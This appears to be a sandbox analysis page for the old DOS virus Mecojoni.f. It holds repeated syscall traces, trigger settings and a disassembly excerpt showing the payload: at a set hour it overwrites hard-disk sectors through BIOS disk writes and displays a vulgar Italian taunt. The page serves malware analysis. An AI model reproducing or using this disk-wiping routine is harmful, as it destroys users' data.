Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.f


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:20:16.319045847Z 74 PC: 12d1b | Reallocate memory
2018-12-17T22:20:16.3210149Z 72 PC: 12d22 | Allocate memory
2018-12-17T22:20:16.323792819Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T22:20:16.326475017Z 72 PC: 13262 | Allocate memory
2018-12-17T22:20:16.328513041Z 75 PC: 1329d | Execute program
2018-12-17T22:20:16.345764405Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:20:16.349334173Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:16.350985918Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:20:16.353297139Z 77 PC: 132cc | Get program return code
2018-12-17T22:20:16.354977055Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3510,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:23.799574531Z 74 PC: 12d1b | Reallocate memory
2018-12-25T11:49:23.801522899Z 72 PC: 12d22 | Allocate memory
2018-12-25T11:49:23.803358018Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T11:49:23.805756375Z 72 PC: 13262 | Allocate memory
2018-12-25T11:49:23.808287527Z 75 PC: 1329d | Execute program
2018-12-25T11:49:23.823813529Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T11:49:23.830981601Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:23.832598947Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:49:23.833998756Z 77 PC: 132cc | Get program return code
2018-12-25T11:49:23.835285121Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":18,"Second":0,"TimeBased":true,"OriginalID":3510,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:24.888304817Z 74 PC: 12d1b | Reallocate memory
2018-12-25T11:49:24.890296713Z 72 PC: 12d22 | Allocate memory
2018-12-25T11:49:24.893138912Z 44 PC: 13461 | Get time
0x13461: cmp cl, 0x12
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T11:49:25.228286844Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T11:49:25.235026633Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI un virus self-modifying!')
2018-12-25T11:49:25.242215609Z 9 PC: 13497 | Display string (String= 'Ricordati che la tua presunzione di conoscere i virus una follia. Arrivederci.')